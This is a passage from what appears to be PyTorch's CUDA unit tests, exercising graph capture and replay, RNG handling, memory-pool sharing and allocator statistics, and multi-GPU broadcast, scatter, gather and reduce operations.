self.assertRaises(TypeError, lambda: torch.empty(1, device="cuda").numpy())
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_capture_simple(self):
s = torch.cuda.Stream()
with torch.cuda.stream(s):
a = torch.full((1000,), 1, device="cuda")
g = torch.cuda._Graph()
torch.cuda.empty_cache()
g.capture_begin()
b = a
for _ in range(10):
b = b + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
g.replay()
self.assertTrue(b.sum().item() == 11000.)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_functional(self):
ops_with_kwargs = ((torch.nn.functional.dropout, {"p": 0.1}),
(torch.nn.functional.rrelu, {"training": True}),)
size = 10000
def run(op, kwargs):
a = torch.randn((size,), device="cuda", dtype=torch.float)
# Control
torch.cuda.manual_seed(5)
eager_out = a
for _ in range(6):
eager_out = op(eager_out, **kwargs)
graph_in = a.clone()
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda._Graph()
torch.cuda.empty_cache()
g.capture_begin()
graph_out = graph_in
for _ in range(2):
graph_out = op(graph_out, **kwargs)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
# Runs a graphed->eager->graphed sequence of RNG ops.
# replay() plays 2 invocations of the op, so the sequence has 6
# invocations total, matching Control.
# replay() reads from graph_in and writes to graph_out.
g.replay()
out = op(graph_out, **kwargs)
out = op(out, **kwargs)
graph_in.copy_(out)
g.replay()
# If replay() updated RNG state correctly, graph_out
# should now hold data equal to eager_out.
try:
self.assertEqual(eager_out, graph_out)
except Exception as e:
raise RuntimeError("Failed on ", op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op, kwargs in ops_with_kwargs:
run(op, kwargs)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_distributions(self):
size = 10000
input = torch.rand((size,), device="cuda", dtype=torch.float)
alloc = torch.empty((size,), device="cuda", dtype=torch.float)
# Torch ops to test with sample args (tuple) and kwargs (dict)
torch_with_args = (("bernoulli", (input.clone(),), {}),
# multinomial uses some uncapturable CUDA calls.
# TODO: reenable multinomial tests if/when the implementation is capturable.
# ("multinomial", (input.clone(), size, True), {}),
# ("multinomial", (input.clone(), size // 2, False), {}),
# TODO: reenable normal test, where std is a device
# tensor, when graph test failures are fixed
# ("normal", (input.clone() + 1, input.clone()), {}),
("normal", (input.clone() + 1, 1.0), {}),
("poisson", (input.clone(),), {}),
("rand", (size,), {"device": "cuda", "dtype": torch.float}),
("randint", (0, 3, (size,)), {"device": "cuda", "dtype": torch.float}),
("randn", (size,), {"device": "cuda", "dtype": torch.float}),)
# Tensor methods to test with sample args (tuple)
tensor_with_args = (("bernoulli_", (input.clone(),)),
("cauchy_", ()),
("exponential_", ()),
("geometric_", (0.3,)),
("log_normal_", ()),
("normal_", ()),
("random_", ()),
("uniform_", ()),)
def run(module, op, args, kwargs):
torch.cuda.manual_seed(5)
# Each path runs a dummy op to increment the state a bit before creating controls.
if (module == "torch"):
dummy = getattr(torch, op)(*args, **kwargs)
control1 = getattr(torch, op)(*args, **kwargs)
control2 = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
control1 = alloc.clone()
control2 = alloc.clone()
getattr(dummy, op)(*args)
getattr(control1, op)(*args)
getattr(control2, op)(*args)
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda._Graph()
torch.cuda.empty_cache()
if (module == "torch"):
g.capture_begin()
t1 = getattr(torch, op)(*args, **kwargs)
t2 = getattr(torch, op)(*args, **kwargs)
g.capture_end()
else:
t1 = alloc.clone()
t2 = alloc.clone()
g.capture_begin()
getattr(t1, op)(*args)
getattr(t2, op)(*args)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
try:
self.assertNotEqual(control1, t1)
self.assertNotEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# Runs a dummy op prelude, as for controls, to make sure replay()
# picks up the dummy op's state increment.
if module == "torch":
dummy = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
getattr(dummy, op)(*args)
# Runs RNG ops that fill t1 and t2.
g.replay()
try:
self.assertEqual(control1, t1)
self.assertEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op_with_args in torch_with_args:
run("torch", *op_with_args)
for meth_with_args in tensor_with_args:
# Adds an empty dict for kwargs, which none of the Tensor methods use
run("Tensor", *(meth_with_args + ({},)))
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_two_successive(self):
torch.cuda.empty_cache()
size = 1000
kSmallBuffer = 2097152
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda._Graph()
g1 = torch.cuda._Graph()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda._graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
for _ in range(5):
b = func_with_temps(b, 1)
g1.capture_end()
torch.cuda.current_stream().wait_stream(s)
# mixes unrelated eager ops with replays
c = a.clone()
for _ in range(2):
c = func_with_temps(c, 3)
g0.replay()
for _ in range(2):
c = func_with_temps(c, 3)
g1.replay()
for _ in range(2):
c = func_with_temps(c, 3)
self.assertEqual(b.sum().item(), size * 3070)
self.assertEqual(c.sum().item(), size * 442)
if share_mem != "Don't share":
self.assertEqual(reserved_no_sharing - torch.cuda.memory_stats()["reserved_bytes.all.current"],
kSmallBuffer)
else:
reserved_no_sharing = torch.cuda.memory_stats()["reserved_bytes.all.current"]
del a, b, c, g0, g1
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skip("Temporarily disabled due to a graphs bug in libcuda.so, " +
"see https://github.com/pytorch/pytorch/pull/57556")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_concurrent_replay(self):
torch.cuda.empty_cache()
size = 1000000 # largeish to help expose race conditions
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda._Graph()
g1 = torch.cuda._Graph()
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda._graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
c = a.clone()
for _ in range(5):
c = func_with_temps(c, 2)
g1.capture_end()
# To reproduce data corruption, I need g0 and g1's kernels to run concurrently.
# But replay() (especially cudaGraphLaunch) can incur significant CPU overhead.
# The following pattern helps align device-side execution of g0 and g1's kernels.
torch.cuda.synchronize()
with torch.cuda.stream(s0):
torch.cuda._sleep(1000000)
s1.wait_stream(s0)
g0.replay()
with torch.cuda.stream(s1):
g1.replay()
torch.cuda.current_stream().wait_stream(s0)
torch.cuda.current_stream().wait_stream(s1)
if share_mem != "Don't share":
# Confirms concurrent replays using the same mempool corrupted each other.
self.assertNotEqual(b.sum().item(), size * 94)
self.assertNotEqual(c.sum().item(), size * 156)
else:
# Confirms concurrent replays using different mempools did not corrupt each other.
self.assertEqual(b.sum().item(), size * 94)
self.assertEqual(c.sum().item(), size * 156)
del a, b, c, g0, g1
# Tensors used across streams (a, b, c) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_three_successive(self):
torch.cuda.empty_cache()
size = 1000
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
a = torch.ones((size,), device="cuda")
g0 = torch.cuda._Graph()
g1 = torch.cuda._Graph()
g2 = torch.cuda._Graph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda._graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
c = b + 1
d = b + 2
g0.capture_end()
args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*args)
e = c + 3
del c
g1.capture_end()
g2.capture_begin(*args)
f = d + 4
g2.capture_end()
torch.cuda.current_stream().wait_stream(s)
# Tests that replaying in capture order is valid
g0.replay()
g1.replay()
g2.replay()
self.assertEqual(e.sum().item(), size * 5)
self.assertEqual(f.sum().item(), size * 7)
# Tests that replaying as g0, g2, g1 is only valid if they don't share a pool
g0.replay()
g2.replay()
g1.replay()
# If share_mem is True, g2's capture should have reused c's memory for f. We replayed g2 then g1,
# so we expect g1's captured "e = c + 3" mistakenly filled e with "f's vals + 3".
self.assertEqual(e.sum().item(), size * (7 + 3) if share_mem != "Don't share" else size * 5)
self.assertEqual(f.sum().item(), size * 7)
del a, b, d, e, f, g0, g1, g2
# Tensors used across streams (a, e, f) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_memory_stats_and_use_result_after_destroy_graph(self):
kSmallSize = 1048576
kSmallBuffer = 2097152
kLargeBuffer = 20971520
kMinLargeAlloc = 10485760
kRoundLarge = 2097152
elem = 4
# this was annoying to write but stresses the expectations pretty rigorously
cases = ((512 // elem, 1, kSmallBuffer, kSmallBuffer, "small_pool"),
(kSmallSize // elem, 2, 2 * kSmallBuffer, kSmallBuffer, "small_pool"),
((kSmallSize + 512) // elem, 1, kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc - 512) // elem, 2, 2 * kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc + 512) // elem, 3,
3 * (kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge)),
kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge),
"large_pool"),)
stats_to_check = ("segment.",
"reserved_bytes.",
"active.",
"active_bytes.")
gc.collect()
torch.cuda.empty_cache()
s = torch.cuda.Stream()
for (numel,
delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_cudaMalloc_bytes_post_del_g,
pool_string) in cases:
if pool_string == "small_pool":
delta_active_blocks = 2 # one from "b" plus a sneaky one from CUDAGraph's one-element rng offset holder
delta_active_bytes = numel * elem + 512 # + 512 for CUDAGraph's rng offset holder
else:
delta_active_blocks = 1 # We only check the large pool, which isn't affected by rng offset holder
delta_active_bytes = numel * elem
g = torch.cuda._Graph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
# Allocation stat estimates assume input is created on the same stream as capture_begin()
# (in other words, the same stream silo as the rng offset holder, which is not allocated from the
# capture's private pool).
a = torch.ones((numel,), device="cuda")
precapture_stats = torch.cuda.memory_stats()
g.capture_begin()
b = a.clone()
for _ in range(5):
b = b.clone() + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
gc.collect()
postcapture_stats = torch.cuda.memory_stats()
expecteds = (delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_active_blocks,
delta_active_bytes)
# Double checks replay and stats before and after a call to empty_cache
for i in range(2):
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postcapture_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre to post capture delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
g.replay()
self.assertEqual(b.sum().item(), 6 * numel)
if i == 0:
torch.cuda.empty_cache()
del g
gc.collect()
torch.cuda.empty_cache()
postdel_stats = torch.cuda.memory_stats()
# Uses graph result b after graph has been deleted
self.assertEqual(b.sum().item(), 6 * numel)
# b should be the only live reference remaining from the graph's private pool
expecteds = (1, delta_cudaMalloc_bytes_post_del_g, 1, numel * elem)
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postdel_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre capture to post graph delete delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
# del a, b before the next case is essential, otherwise overwriting a and b in the next case
# can throw off its allocation/deallocation counts.
del a, b
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_record_stream(self):
# Makes sure graph capture defers attempting to reclaim allocations used across streams. See
# "Q. Why skip process_events if a capture might be underway?" in c10/cuda/CUDACachingAllocator.cpp
torch.cuda.empty_cache()
potential_problem = torch.zeros((3,), device="cuda")
a = torch.zeros((3,), device="cuda")
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
g = torch.cuda._Graph()
torch.cuda.synchronize()
with torch.cuda.stream(s0):
potential_problem.record_stream(s0)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
potential_problem.fill_(1.)
del potential_problem
with torch.cuda.stream(s1):
g.capture_begin()
# potential_problem's allocation should still be outstanding. if DeviceCachingAllocator::malloc
# mistakenly calls process_events, it will trigger cudaEventQueries on potential_problem's end-of-life
# event, which will cause the capture to error.
b = a.clone()
# Let's also see what happens if we record_stream on a tensor during capture.
s2.wait_stream(s1)
with torch.cuda.stream(s2):
b.fill_(1.)
b.record_stream(s2) # dummy record_stream
del b
s1.wait_stream(s2)
g.capture_end()
torch.cuda.synchronize()
# dummy allocation triggers process_events, Hopefully successfully processes b's end-of-life event.
c = torch.zeros((3,), device="cuda")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
# If this test is the first in the process to try cudnn rnns with dropout, it'll initialize
# DropoutState's long-lived internal buffer. Calling code perceives this (correct) behavior
# as a memory leak unless we skip the leak check.
@skipCUDAMemoryLeakCheckIf(True)
def test_graph_cudnn_dropout(self):
# Tests the interaction of cuda graph capture with DropoutState's syncs in ATen/native/cudnn/RNN.cpp.
# In particular, if user runs a sequence of captured and noncaptured cudnn rnns, DropoutState should
# avoid syncing noncapturing streams with captured events or vice versa.
torch.cuda.empty_cache()
model = torch.nn.LSTM(512, 512, 2, dropout=0.5).cuda()
x = torch.ones(100, 192, 512, device="cuda")
y = model(x)
g = torch.cuda._Graph()
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g.capture_begin()
y = model(x)
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
y = model(x)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_grad_scaling(self):
scaler = torch.cuda.amp.GradScaler(init_scale=4.)
g = torch.cuda._Graph()
s = torch.cuda.Stream()
weight = torch.ones((100,), device="cuda", requires_grad=True)
opt = torch.optim.SGD([weight], lr=0.1)
static_input = torch.ones_like(weight)
static_grad = torch.ones_like(weight)
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
# warmup
weight.grad = (scaler.scale(static_grad) * static_input).half().float()
# capture
g.capture_begin()
weight.grad = (scaler.scale(static_grad) * static_input).half().float()
# The above simulates a rudimentary backward pass.
# TODO: Once full-backward() capture is enabled (see https://github.com/pytorch/pytorch/pull/54227)
# change to
# loss = (w.half() * static_input).sum()
# scaler.scale(loss).backward()
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
input_vals = [5, 20000, 5, 40000]
# If the scale gets updated properly, these are the scale, growth tracker,
# and grad values we expect.
expected_scales = [4, 2, 2, 1]
expected_growth_trackers = [1, 0, 1, 0]
expected_grad_vals = [5 * 4, float("inf"), 5 * 2, float("inf")]
for data, scale, growth_tracker, grad_val in zip(input_vals,
expected_scales,
expected_growth_trackers,
expected_grad_vals):
static_input.fill_(data)
g.replay()
self.assertEqual(weight.grad, torch.full_like(weight.grad, grad_val))
scaler.step(opt)
scaler.update()
self.assertEqual(scaler._scale, scale)
self.assertEqual(scaler._growth_tracker, growth_tracker)
def test_batch_norm_gather_stats(self):
input = torch.randn(1, 3, 3, 3, device='cuda')
mean, invstd = torch.batch_norm_gather_stats(
input, mean=torch.ones(2, 3, device='cuda'), invstd=torch.ones(2, 3, device='cuda'),
running_mean=None, running_var=None , momentum=.1, eps=1e-5, count=2
)
self.assertEqual(mean, torch.ones(3, device='cuda'))
self.assertEqual(invstd, torch.ones(3, device='cuda'))
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_cuda_device_memory_allocated(self):
from torch.cuda import memory_allocated
device_count = torch.cuda.device_count()
current_alloc = [memory_allocated(idx) for idx in range(device_count)]
x = torch.ones(10, device="cuda:0")
self.assertTrue(memory_allocated(0) > current_alloc[0])
self.assertTrue(all(memory_allocated(torch.cuda.device(idx)) == current_alloc[idx] for idx in range(1, device_count)))
def test_matmul_memory_use(self):
def get_max_used():
torch.cuda.synchronize()
val = torch.cuda.max_memory_allocated()
torch.cuda.reset_peak_memory_stats()
return val
a = torch.rand(1, 32, 32, device="cuda")
b = torch.rand(24, 32, 1, device="cuda")
get_max_used()
torch.matmul(a, b)
matmul_mem = get_max_used()
a = a.expand(24, 32, 32)
torch.matmul(a, b)
matmul_expand_mem = get_max_used()
torch.bmm(a, b)
bmm_mem = get_max_used()
self.assertEqual(matmul_expand_mem, matmul_mem)
self.assertEqual(bmm_mem, matmul_mem)
class TestCudaComm(TestCase):
def _test_broadcast(self, input):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
# test regular
results = comm.broadcast(input, (0, 1))
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
if input.is_cuda and input.get_device() == i: # test not copying on same device
self.assertEqual(t.data_ptr(), input.data_ptr())
# test out=
for inplace in [True, False]:
if inplace:
outputs = [torch.empty_like(input, device=0), torch.empty_like(input, device=1)]
else:
outputs = [input.cuda(0), torch.empty_like(input, device=1)]
results = comm.broadcast(input, out=outputs)
for r, o in zip(results, outputs):
self.assertIs(r, o)
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"Exactly one of 'devices' and 'out'"):
comm.broadcast(input, (0, 1), out=outputs)
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cpu()])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to have same shape as the source .+ at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cuda(1).unsqueeze(0)])
def test_broadcast_cpu(self):
self._test_broadcast(torch.randn(5, 5))
def test_broadcast_gpu(self):
self._test_broadcast(torch.randn(5, 5).cuda())
def _test_broadcast_coalesced(self, tensors, buffer_size):
b_tensors = [comm.broadcast(t, (0, 1)) for t in tensors]
for (_, bt), t in zip(b_tensors, tensors):
self.assertEqual(bt.get_device(), 1)
self.assertEqual(bt, t)
self.assertIsInstance(bt, type(t))
bc_tensors = comm.broadcast_coalesced(tensors, (0, 1), buffer_size=buffer_size)
bc_tensors_t = list(zip(*bc_tensors))
self.assertEqual(b_tensors, bc_tensors_t)
for (_, bt), (_, bct) in zip(b_tensors, bc_tensors_t):
self.assertEqual(bt.get_device(), bct.get_device())
self.assertIsInstance(bct, type(bt))
# check that tensors on device[0] are returned as-is
for out_tensors in (b_tensors, bc_tensors_t):
for inp_t, (out_t, _) in zip(tensors, out_tensors):
self.assertIs(inp_t, out_t)
# check that the tensors not on device[0] have different version counters
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for _, t in bc_tensors_t]
for old_version, (_, t) in zip(versions, bc_tensors_t):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
# Note: fails sometimes on the CI, passes on dual gfx906
def test_broadcast_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_empty_tensors(self):
tensors = [
torch.tensor([]).byte().cuda(),
torch.randn(5).cuda(),
torch.randn(5).double().cuda()
]
self._test_broadcast_coalesced(tensors, 256)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
x_cuda = x.cuda(0)
y_cuda = y.cuda(1)
result = comm.reduce_add((x_cuda, y_cuda))
self.assertEqual(result.get_device(), 0)
self.assertEqual(result.cpu(), x + y)
def _test_reduce_add_coalesced(self, tensors, buffer_size):
dup_tensors = [tensors, [t.cuda(1) for t in tensors]]
r_tensors = [comm.reduce_add(t) for t in zip(*dup_tensors)]
for r, t in zip(r_tensors, tensors):
self.assertEqualTypeString(r, t)
self.assertEqual(r, t * 2)
rc_tensors = comm.reduce_add_coalesced(dup_tensors, buffer_size=buffer_size)
self.assertEqual(r_tensors, rc_tensors)
for r, rc in zip(r_tensors, rc_tensors):
self.assertEqualTypeString(rc, r)
# Since we have both cuda:0 and cuda:1 inputs, the outputs must be new.
# We can check that they have different version counters.
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for t in rc_tensors]
for old_version, t in zip(versions, rc_tensors):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
def _test_scatter(self, input, chunk_sizes=None, dim=0):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
if chunk_sizes is None:
ref_chunk_sizes = tuple(repeat(input.size(dim) // 2, 2))
else:
ref_chunk_sizes = chunk_sizes
# test regular
result = comm.scatter(input, (0, 1), chunk_sizes, dim)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
if r.device == input.device:
self.assertEqual(r.data_ptr(), input.data_ptr()) # for target @ same device, a view should be returned
# test out
out = [torch.empty_like(t) for t in result]
result = comm.scatter(input, dim=dim, out=out)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
self.assertIs(r, out[i])
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
# test error msg
if chunk_sizes is not None:
with self.assertRaisesRegex(RuntimeError, r"Expected devices and chunk_sizes to be of same length"):
comm.scatter(input, [0 for _ in range(len(chunk_sizes) + 1)], dim=dim, chunk_sizes=chunk_sizes)
with self.assertRaisesRegex(RuntimeError, r"'devices' must not be specified"):
comm.scatter(input, (0, 1), dim=dim, out=out)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one device to scatter to"):
comm.scatter(input, (), dim=dim)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one output tensor to scatter to"):
comm.scatter(input, dim=dim, out=[])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 0"):
comm.scatter(input, dim=dim, out=([out[0].cpu()] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Output tensor at index 0 has incorrect shape"):
comm.scatter(input, dim=dim, out=([out[0].unsqueeze(0)] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Total size for output tensors along scatter dim \d+ does not match"):
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(1, None)
comm.scatter(input, dim=dim, out=([out[0][tuple(index)]] + out[1:]))
def test_scatter_cpu(self):
self._test_scatter(torch.randn(4, 4), dim=0)
def test_scatter_cpu_dim(self):
self._test_scatter(torch.randn(4, 4), dim=1)
def test_scatter_cpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4), dim=-2)
def test_scatter_cpu_sizes(self):
self._test_scatter(torch.randn(6, 4), chunk_sizes=(2, 4))
def test_scatter_gpu(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=0)
def test_scatter_gpu_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=1)
def test_scatter_gpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=-2)
def test_scatter_gpu_sizes(self):
self._test_scatter(torch.randn(6, 4).cuda(), chunk_sizes=(2, 4))
def _test_gather(self, dim):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
x = torch.randn(2, 5, device=0)
y = torch.randn(2, 5, device=1)
expected_size = list(x.size())
expected_size[dim] += y.size(dim)
expected_size = torch.Size(expected_size)
destinations = [None, torch.device('cuda:0'), torch.device('cpu')]
if torch.cuda.device_count() > 2:
destinations.append(torch.device('cuda:2'))
with torch.cuda.device(1):
for destination in destinations:
if destination is None:
expected_device = torch.device('cuda', torch.cuda.current_device())
else:
expected_device = destination
for use_out in [True, False]:
if use_out:
out = torch.empty(expected_size, device=expected_device)
result = comm.gather((x, y), dim, out=out)
self.assertIs(out, result)
else:
result = comm.gather((x, y), dim, destination=destination)
self.assertEqual(result.device, expected_device)
self.assertEqual(result.size(), expected_size)
index = [slice(None, None), slice(None, None)]
index[dim] = slice(0, x.size(dim))
self.assertEqual(result[tuple(index)], x)
index[dim] = slice(x.size(dim), x.size(dim) + y.size(dim))
self.assertEqual(result[tuple(index)], y)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"'destination' must not be specified"):
comm.gather((x, y), dim, destination='cpu', out=torch.empty(expected_size, device='cpu'))
